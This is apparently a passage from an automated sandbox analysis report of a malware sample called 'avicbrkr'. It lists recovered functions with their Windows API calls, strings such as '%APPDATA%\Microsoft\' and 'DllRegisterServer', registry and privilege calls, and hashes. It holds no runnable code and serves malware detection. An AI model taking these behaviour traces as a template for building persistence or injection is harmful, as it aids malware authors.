                        • Part of subcall function 003724A8: CreateThread.KERNEL32(00000000,00000000,0037245F,00000000,00000000,00000000), ref: 0037250C
                        • Part of subcall function 003724A8: CloseHandle.KERNEL32(00000000), ref: 00372517
                        • Part of subcall function 003724A8: GetLastError.KERNEL32(?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000,0039E1CF,0037D7DB,00000000,00000000), ref: 0037251F
                        • Part of subcall function 003724A8: HeapFree.KERNEL32(00000000,00000000), ref: 00372530
                        • Part of subcall function 00373EAC: RegCloseKey.ADVAPI32(00000057,?,?,003728FD,0039E1CF,00000000,00000000,00000000,~FvR9,00000000,00397048,?,?,?,00374C4E,00000000), ref: 00373EF7
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Close$AllocateCreateFreelstrcpylstrlen$ErrorHandleLastThreadmemcpy
                      • String ID: ~FvR9
                      • API String ID: 4111979484-3041887914
                      • Opcode ID: be8392e9fc551c31568ed4d5c4f559947d72918a1fc3faf34a4712e74755585d
                      • Instruction ID: 93d7c623d3403dd9415da9c636353a64e36276b04e3f33b656ee37c1f9e1dbeb
                      • Opcode Fuzzy Hash: be8392e9fc551c31568ed4d5c4f559947d72918a1fc3faf34a4712e74755585d
                      • Instruction Fuzzy Hash: 1E31893191021CFADB339F65CC49A9F7EB8EF45B50F158056F909A7260D37A4D40DBA1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00378660, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00375D28: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00375D36
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 003786C1
                      • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00378712
                        • Part of subcall function 00386FE8: GetLastError.KERNEL32 ref: 00387032
                        • Part of subcall function 00386FE8: WaitForSingleObject.KERNEL32(000000C8), ref: 00387057
                        • Part of subcall function 00386FE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?,?), ref: 003870A2
                        • Part of subcall function 00386FE8: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 003870B7
                        • Part of subcall function 00386FE8: SetEndOfFile.KERNEL32(?,?,?,?), ref: 003870C4
                        • Part of subcall function 00386FE8: GetLastError.KERNEL32(?,?,?), ref: 003870D0
                        • Part of subcall function 00386FE8: CloseHandle.KERNEL32(?), ref: 003870DC
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 00378747
                      • HeapFree.KERNEL32(00000000,?), ref: 00378757
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FileHeap$AllocateErrorFreeLastTime$CloseHandleObjectPointerSingleSystemWaitWrite
                      • String ID: https://
                      • API String ID: 106834057-4275131719
                      • Opcode ID: 808a7cd1c3c82632aa7feaf0e2336e058b89ddc8890ee70cc35fcb668c425d2d
                      • Instruction ID: 69614a7c346e841c97aa128f717634782617c31d4ea7a34f28877e6684bb383b
                      • Opcode Fuzzy Hash: 808a7cd1c3c82632aa7feaf0e2336e058b89ddc8890ee70cc35fcb668c425d2d
                      • Instruction Fuzzy Hash: 73315A76510019FFDB129FA4DC89CAEBB7DEF09340B104066F605E7260DB76AE50DBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00374151, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80memorystringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0038ED55: memcpy.NTDLL(00000000,00000204,00000204,0037D7B1,00000000,00000000,0038EDCD,0037D7B1,0037D7B1,0037D7B1,00000000,?,?,00374EE9,00000000,00000001), ref: 0038ED73
                        • Part of subcall function 0038ED55: memset.NTDLL ref: 0038EDA5
                      • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 003741A5
                      • lstrcmpi.KERNEL32(00000000,0039F23C), ref: 003741C5
                        • Part of subcall function 00375A61: lstrlen.KERNEL32(00000008,?,?,?,003741E9,00000000,00000000), ref: 00375AC1
                        • Part of subcall function 00375A61: HeapFree.KERNEL32(00000000,00000000), ref: 00375AE3
                        • Part of subcall function 00375A61: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,003741E9,00000000,00000000), ref: 00375AF5
                        • Part of subcall function 00375A61: lstrcpy.KERNEL32(00000020,00000008), ref: 00375B27
                        • Part of subcall function 00375A61: RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375B33
                        • Part of subcall function 00375A61: Sleep.KERNEL32(0000000A), ref: 00375B3D
                        • Part of subcall function 00375A61: RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375B8B
                        • Part of subcall function 00374109: RegCloseKey.ADVAPI32(?,?,?,003741F7,00000000,?,?,00000000,00000000,-00000008), ref: 00374143
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037420A
                      • HeapFree.KERNEL32(00000000,?,?), ref: 0037421B
                        • Part of subcall function 0038E8FE: RtlEnterCriticalSection.NTDLL(0039D43C), ref: 0038E90B
                        • Part of subcall function 0038E8FE: Sleep.KERNEL32(0000000A,?,00397044,0038E984,0039D480,00000000,00397050,0038F19B), ref: 0038E915
                        • Part of subcall function 0038E8FE: RtlLeaveCriticalSection.NTDLL(0039D43C), ref: 0038E964
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalHeapSection$Free$EnterLeaveSleepmemcpy$AllocateCloselstrcmpilstrcpylstrlenmemset
                      • String ID: Main
                      • API String ID: 4064754226-521822810
                      • Opcode ID: 3da0178e32272a16cb92d8f63fdb5acfd6a14ef4e924c4169fbd0d203ad72d9b
                      • Instruction ID: 917791917a0e848b7e7edd5ae344a486fe6fca28e3c78e2519ed9480b333c2fd
                      • Opcode Fuzzy Hash: 3da0178e32272a16cb92d8f63fdb5acfd6a14ef4e924c4169fbd0d203ad72d9b
                      • Instruction Fuzzy Hash: 45218135A00208FFCF23AFA5EC85E9E7BB9EB04344F108462F508AA166D735AD559B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003743BE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63memoryregistryCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,?), ref: 003743DC
                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 00374412
                      • HeapFree.KERNEL32(00000000,?), ref: 0037444B
                      • RegCloseKey.ADVAPI32(?), ref: 00374454
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateCloseFreeOpen
                      • String ID: Main
                      • API String ID: 2210887687-521822810
                      • Opcode ID: b1d750e4d0f1914fa4de8ed5688894c095587d84403c0a98eb8f55ae367d4814
                      • Instruction ID: dfd3a600897adbf0644d97331c21df2e3ec6fad3156005dd9893e5751af1d9df
                      • Opcode Fuzzy Hash: b1d750e4d0f1914fa4de8ed5688894c095587d84403c0a98eb8f55ae367d4814
                      • Instruction Fuzzy Hash: BC11E3B6900119FFDF12AFD5DD85CEEBBBDEB48304F1044A6E601A2120E7769E51EB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003886D3, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlen.KERNEL32(?,00000000,0039CC00,?,00371953,?), ref: 003886DD
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 00388708
                      • lstrcat.KERNEL32(00000000,?), ref: 0038874E
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateHeaplstrcatlstrlen
                      • String ID: k9$R9
                      • API String ID: 745444535-2586805748
                      • Opcode ID: 07efa3d239d2cdd59ae502184e9e351fe334fffda72b7e3806f0b76d39a1e873
                      • Instruction ID: 737ba357dac7dd1126c1ad33eb120f39b3f92e9b764fd8f4d74bd339f814f323
                      • Opcode Fuzzy Hash: 07efa3d239d2cdd59ae502184e9e351fe334fffda72b7e3806f0b76d39a1e873
                      • Instruction Fuzzy Hash: B2018076104742A7D322AB759C98F2BBABCAB84741F554869FA05D2240DF25D8098771
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037B7D8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49sleepCOMMON
                      Download Yara Rule
                      APIs
                      • RtlEnterCriticalSection.NTDLL(0039D508), ref: 0037B7E3
                      • Sleep.KERNEL32(0000000A,?,?,0037CF37,00000000), ref: 0037B7ED
                      • RtlLeaveCriticalSection.NTDLL(0039D508), ref: 0037B863
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                      • SetEvent.KERNEL32(?,?,0037CF37), ref: 0037B844
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSection$EnterEventLeaveSleeplstrlenmemcpymemset
                      • String ID: 3O9
                      • API String ID: 3071338061-4052244761
                      • Opcode ID: 7848e6288a3659934eafc09d6b73b83a4a73bb341fe95b709e27f7095d8eddca
                      • Instruction ID: 7b145e00c8a0c5226880793f8a1b2e09e591b1fc37ecc9d899f91b49fc3896ba
                      • Opcode Fuzzy Hash: 7848e6288a3659934eafc09d6b73b83a4a73bb341fe95b709e27f7095d8eddca
                      • Instruction Fuzzy Hash: 0E019E70654304FBDB22AB65EC86F5A7BACFB14705F404022F609DA1A1D7769A00CBA2
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00372AD3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 00372AEC
                        • Part of subcall function 00386EB8: lstrlen.KERNEL32(?,?,00000000,?,00000000,003777E2,?,?,?,?,?,?,?,?,?,00371255), ref: 00386EC7
                      • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00372B8E,?), ref: 00372B1A
                      • lstrlenW.KERNEL32(00000000,?,?,00372B8E,?), ref: 00372B26
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00372B3E
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heaplstrlen$AllocateCreateDirectoryFree
                      • String ID: %APPDATA%\Microsoft\
                      • API String ID: 1351683892-2699254172
                      • Opcode ID: 7e45aa45d2d04363ac77d190ff1d9c72225fc194b404cfd615d6b5116b70bf20
                      • Instruction ID: 0f2a2591954cd89918664699644cfad934eb25d6744f0e24eeb9f644cd7e54dd
                      • Opcode Fuzzy Hash: 7e45aa45d2d04363ac77d190ff1d9c72225fc194b404cfd615d6b5116b70bf20
                      • Instruction Fuzzy Hash: 53016D32111314BBD7139F94DC8AF8A7B6CEB09754F104002F905663A0D7B69D00CB64
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037E25E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38memorythreadCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
                      • CreateThread.KERNEL32(00000000,00000000,0037E1CA,00000000,00000000,00000000), ref: 0037E282
                      • CloseHandle.KERNEL32(00000000), ref: 0037E28D
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037E29D
                      • GetLastError.KERNEL32(?,00374DBE,00000000,0039E1CA,00000000,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0037E2A3
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseCreateErrorFreeHandleHeapLastThreadlstrlenmemcpymemset
                      • String ID: ~FvR9
                      • API String ID: 3409056091-3041887914
                      • Opcode ID: 9badf497c643c5d1a6b4bcd9835926aa2dd87a7e190ac86165dd9d21ed9d63fb
                      • Instruction ID: b785f5836dc2ac79a43149aee2a2a49fcbc5374570cea7ef40675b14bb16c92f
                      • Opcode Fuzzy Hash: 9badf497c643c5d1a6b4bcd9835926aa2dd87a7e190ac86165dd9d21ed9d63fb
                      • Instruction Fuzzy Hash: 2CF0A732214114BBC2337B26EC0DDAB7F6DDBC9BA1B054863F90ED61A0E6364845D6B0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00389B2D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenW.KERNEL32(?,00000000,?,.dll,00372C36,?,.dll,00000094,00001000,?,?,00001000,?,L"7), ref: 00389B3B
                      • lstrlen.KERNEL32(DllRegisterServer,?,L"7), ref: 00389B49
                      • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 00389B5E
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: lstrlen$AllocateHeap
                      • String ID: .dll$DllRegisterServer
                      • API String ID: 3070124600-294589026
                      • Opcode ID: a8dad98b49ba9a331932c162569f7747912f142d4a6bba26120c9f2f6715d8ea
                      • Instruction ID: 0f78d77288b4f720b0cf412dc3d77b335f6f222abd081a4a8d99187e9e545f75
                      • Opcode Fuzzy Hash: a8dad98b49ba9a331932c162569f7747912f142d4a6bba26120c9f2f6715d8ea
                      • Instruction Fuzzy Hash: 9FF037735013207BC7235B69AC88E67BAACEF85755B090577FA05E3365D6258C1086A4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 006341F8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenW.KERNEL32(00000000,?,!Cc,00633030,00000000,?), ref: 0063420B
                      • lstrlen.KERNEL32(?), ref: 00634216
                      • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0063422B
                      • wsprintfW.USER32 ref: 00634243
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: lstrlen$AllocateHeapwsprintf
                      • String ID: !Cc
                      • API String ID: 2281473501-3374438881
                      • Opcode ID: e6a9db3a8fdbab0c959eaa95bb16786e180404f1e3b4feed4bbf3352f2e4eccb
                      • Instruction ID: 6edf3ce8bc142ea5cc5d7f09d163cdba5666edc2b3009d4dfa24eef40a059e87
                      • Opcode Fuzzy Hash: e6a9db3a8fdbab0c959eaa95bb16786e180404f1e3b4feed4bbf3352f2e4eccb
                      • Instruction Fuzzy Hash: 6FF05432401228BBCB222F95DC059DBBF66EF05791F058121FD09A7221DB319A509BD0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038BF28, Relevance: 7.7, APIs: 5, Instructions: 196timestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • FileTimeToLocalFileTime.KERNEL32(00000000,003726D4), ref: 0038BF8A
                      • FileTimeToSystemTime.KERNEL32(003726D4,?), ref: 0038BF98
                      • lstrlenW.KERNEL32(?), ref: 0038C056
                        • Part of subcall function 0038BD45: memcpy.NTDLL(00000000,00000000,00010000,00000000,00000000,00000000,00000000,?,0038C085,00000000,-00000032,00000000), ref: 0038BD6F
                      • FileTimeToLocalFileTime.KERNEL32(00000008,003726D4), ref: 0038C0A0
                      • FileTimeToSystemTime.KERNEL32(003726D4,?), ref: 0038C0AE
                        • Part of subcall function 0038AC59: RtlLeaveCriticalSection.NTDLL(00000000), ref: 0038ACD6
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Time$File$HeapLocalSystem$AllocateCriticalFreeLeaveSectionlstrlenmemcpy
                      • String ID:
                      • API String ID: 3654888788-0
                      • Opcode ID: 5c41f5fa223b22b00ee4f415d4cf9096d506291b1b1bb49b3bf73712bf4d4784
                      • Instruction ID: f69a3208d03a6f14b3ceeb0099cec09efc8cbf212407d322bceaff2f2b037c3c
                      • Opcode Fuzzy Hash: 5c41f5fa223b22b00ee4f415d4cf9096d506291b1b1bb49b3bf73712bf4d4784
                      • Instruction Fuzzy Hash: 56712CB191020AEBCB51DFA9C884AEEB7FCBF08344F14446AF505E7251E739DA45DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00372C81, Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 164memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00372549: lstrlen.KERNEL32(?,?,00000000,00000000,00372CBA,00000000,L"7,?,00000000,?), ref: 00372553
                        • Part of subcall function 00372549: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00372568
                        • Part of subcall function 00372549: HeapFree.KERNEL32(00000000,00000000,00377487), ref: 003725B0
                      • memset.NTDLL ref: 00372CE9
                        • Part of subcall function 003775E0: GetTickCount.KERNEL32(00000000,00000000,00000000,L"7,00372CFD,00000000), ref: 003775F0
                        • Part of subcall function 003775E0: CreateFileW.KERNEL32(00000000,80000000,00000003,0039D2D8,00000003,00000000,00000000), ref: 0037760D
                        • Part of subcall function 003775E0: GetFileSize.KERNEL32(?,00000000,Local\,00000001), ref: 00377639
                        • Part of subcall function 003775E0: CreateFileMappingA.KERNEL32(00000000,0039D2D8,00000002,00000000,00000000,?), ref: 0037764D
                        • Part of subcall function 003775E0: lstrlen.KERNEL32(?), ref: 00377669
                        • Part of subcall function 003775E0: lstrcpy.KERNEL32(?,?), ref: 00377679
                        • Part of subcall function 003775E0: GetLastError.KERNEL32 ref: 00377681
                        • Part of subcall function 003775E0: HeapFree.KERNEL32(00000000,?), ref: 00377694
                        • Part of subcall function 003775E0: CloseHandle.KERNEL32(?), ref: 003776A6
                        • Part of subcall function 003775E0: GetLastError.KERNEL32 ref: 003776AE
                      • CloseHandle.KERNEL32(?), ref: 00372D32
                        • Part of subcall function 00372B4D: RtlImageNtHeader.NTDLL(00000094), ref: 00372B6E
                        • Part of subcall function 00372B4D: CloseHandle.KERNEL32(0039D198), ref: 00372BB7
                        • Part of subcall function 00372B4D: HeapFree.KERNEL32(00000000,?,?), ref: 00372C5E
                        • Part of subcall function 00372B4D: HeapFree.KERNEL32(00000000,?,.dll), ref: 00372C6D
                        • Part of subcall function 0037164D: RtlImageNtHeader.NTDLL(?), ref: 0037165E
                        • Part of subcall function 0037164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 00371685
                        • Part of subcall function 0037164D: GetTickCount.KERNEL32 ref: 0037169C
                        • Part of subcall function 0037164D: wsprintfA.USER32 ref: 003716AC
                        • Part of subcall function 0037164D: RegCreateKeyA.ADVAPI32(80000001,0039E2C1,?), ref: 003716E0
                        • Part of subcall function 0037164D: StrRChrA.SHLWAPI(00000000,00000000,?), ref: 003716FB
                        • Part of subcall function 0037164D: lstrlen.KERNEL32(00000000), ref: 00371705
                        • Part of subcall function 0037164D: RegCloseKey.ADVAPI32(?), ref: 00371721
                        • Part of subcall function 0037164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037172F
                        • Part of subcall function 00371A0C: RtlImageNtHeader.NTDLL ref: 00371A4C
                        • Part of subcall function 00371A0C: GetCurrentThreadId.KERNEL32 ref: 00371A62
                        • Part of subcall function 00371A0C: GetCurrentThread.KERNEL32 ref: 00371A73
                        • Part of subcall function 00371A0C: HeapFree.KERNEL32(00000000,?,00000000), ref: 00371AE7
                        • Part of subcall function 00371A0C: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 00371AF7
                        • Part of subcall function 00371A0C: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 00371B43
                        • Part of subcall function 00371A0C: wsprintfA.USER32 ref: 00371B54
                        • Part of subcall function 00371A0C: lstrlen.KERNEL32(00000000,00000000), ref: 00371B5F
                        • Part of subcall function 00371A0C: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 00371B79
                        • Part of subcall function 0037154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 0037155B
                        • Part of subcall function 0037154D: GetLastError.KERNEL32(?,00372DF9), ref: 00371572
                        • Part of subcall function 00371586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0037159D
                        • Part of subcall function 00371586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00372E03,00000094,?), ref: 003715AF
                        • Part of subcall function 00371586: StrChrA.SHLWAPI(00000000,0000003A), ref: 003715BC
                        • Part of subcall function 00371586: wsprintfA.USER32 ref: 003715D0
                        • Part of subcall function 00371586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 003715E6
                        • Part of subcall function 00371586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000,?,?,?), ref: 003715FF
                        • Part of subcall function 00371586: WriteFile.KERNEL32(00000000,00000000,?,?,?), ref: 00371607
                        • Part of subcall function 00371586: GetLastError.KERNEL32(?,?,?), ref: 00371615
                        • Part of subcall function 00371586: CloseHandle.KERNEL32(00000000), ref: 0037161E
                        • Part of subcall function 00371586: GetLastError.KERNEL32(?,00372E03,00000094,?), ref: 0037162F
                        • Part of subcall function 00371586: HeapFree.KERNEL32(00000000,00000000), ref: 0037163F
                        • Part of subcall function 0037BB29: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,003714F5,?,00000000,00000000,00000000,00000006), ref: 0037BB47
                        • Part of subcall function 0037BB29: wsprintfA.USER32 ref: 0037BB65
                        • Part of subcall function 0037BBDE: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0037BC08
                        • Part of subcall function 0037BBDE: HeapFree.KERNEL32(00000000,00000000), ref: 0037BC57
                      • HeapFree.KERNEL32(00000000,?,?), ref: 00372EEC
                        • Part of subcall function 00371E8C: InterlockedExchange.KERNEL32(0039D190,00000000), ref: 00371E98
                        • Part of subcall function 00371E8C: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 00371EB3
                        • Part of subcall function 00371E8C: lstrcpy.KERNEL32(00000000,0039E520), ref: 00371ED4
                        • Part of subcall function 00371E8C: HeapFree.KERNEL32(00000000,00000000,?), ref: 00371EF5
                        • Part of subcall function 00371F02: InterlockedExchange.KERNEL32(0039D190,00000000), ref: 00371F0A
                        • Part of subcall function 003726B3: HeapFree.KERNEL32(00000000,?,?), ref: 00372723
                        • Part of subcall function 003724A8: lstrlen.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000), ref: 003724BF
                        • Part of subcall function 003724A8: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 003724D2
                        • Part of subcall function 003724A8: lstrcpy.KERNEL32(00000008,00000000), ref: 003724F4
                        • Part of subcall function 003724A8: CreateThread.KERNEL32(00000000,00000000,0037245F,00000000,00000000,00000000), ref: 0037250C
                        • Part of subcall function 003724A8: CloseHandle.KERNEL32(00000000), ref: 00372517
                        • Part of subcall function 003724A8: GetLastError.KERNEL32(?,?,?,003728E5,00371F67,00000000,00000000,?,?,?,00374C4E,00000000,0039E1CF,0037D7DB,00000000,00000000), ref: 0037251F
                        • Part of subcall function 003724A8: HeapFree.KERNEL32(00000000,00000000), ref: 00372530
                      • GetLastError.KERNEL32(?,00000000,?), ref: 003731DA
                        • Part of subcall function 00371473: RtlAllocateHeap.NTDLL(00000000,?), ref: 003714AA
                        • Part of subcall function 00371473: wsprintfA.USER32 ref: 003714CD
                        • Part of subcall function 00371473: HeapFree.KERNEL32(00000000,00000000,?), ref: 003714FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Allocate$ErrorLast$CloseHandle$CreateFilelstrlenwsprintf$HeaderImageThreadlstrcpy$CountCurrentExchangeInterlockedTick$AdjustDirectoryMappingModulePrivilegeSizeSystemTimeWindowsWritememset
                      • String ID: L"7
                      • API String ID: 416383009-2580434585
                      • Opcode ID: f22bee21aaa322a3e37f383afae96b1ea61b8eefb7eb2d19e7dfc7d0b29179f4
                      • Instruction ID: efcd05b373d7419ce3f13ce0700cd42a8fe59c06111bd80838c4ccacbd2cdf88
                      • Opcode Fuzzy Hash: f22bee21aaa322a3e37f383afae96b1ea61b8eefb7eb2d19e7dfc7d0b29179f4
                      • Instruction Fuzzy Hash: 26418F72604108FADF33BE649C81ABF376DAB05360F51C125F90D65491DB7D8F50BA62
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038CAE5, Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0038CA67: GetTickCount.KERNEL32 ref: 0038CA7D
                        • Part of subcall function 0038CA67: wsprintfA.USER32 ref: 0038CAB7
                        • Part of subcall function 0038CA67: GetModuleHandleA.KERNEL32(00000000), ref: 0038CAC9
                      • GetModuleHandleA.KERNEL32(00000000,?), ref: 0038CB4C
                      • GetLastError.KERNEL32 ref: 0038CB72
                      • SetEvent.KERNEL32(00000000), ref: 0038CB85
                      • GetModuleHandleA.KERNEL32(00000000), ref: 0038CBC9
                      • memset.NTDLL ref: 0038CBDE
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HandleModule$CountErrorEventLastTickmemsetwsprintf
                      • String ID:
                      • API String ID: 4155302542-0
                      • Opcode ID: a0dddb3c435a92a79f16b410102b4292357410ad0a825b4afc5540c66f2ea520
                      • Instruction ID: 52dbb74e0da941c90b9d7008c7ee1833f3916f8dc956ff3d39bdff38bf84304c
                      • Opcode Fuzzy Hash: a0dddb3c435a92a79f16b410102b4292357410ad0a825b4afc5540c66f2ea520
                      • Instruction Fuzzy Hash: 43416FB1910704AFCB23EFA9DD89C6ABBBCEB85710B2555AAE446D3100D731AD04CB70
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00378E10, Relevance: 7.6, APIs: 5, Instructions: 126memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00378968: RtlAllocateHeap.NTDLL(00000000,?), ref: 003789A2
                      • RtlAllocateHeap.NTDLL(00000000,00397045,?), ref: 00378EB4
                      • memcpy.NTDLL(00000000,00000000,00000000), ref: 00378ECB
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00378EDE
                      • memcpy.NTDLL(00000000,?,?), ref: 00378EED
                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 00378F51
                        • Part of subcall function 00389765: lstrlen.KERNEL32(00000000,~FvR9,00000000,00000000,00374E8A,00000000,00000000,00000000,00000000,0037D7DB,00000000,00000000,?,00000001,0037D9CC), ref: 0038976E
                        • Part of subcall function 00389765: memcpy.NTDLL(00000000,?,00000000,00000001,?,00000001,0037D9CC), ref: 00389791
                        • Part of subcall function 00389765: memset.NTDLL ref: 003897A0
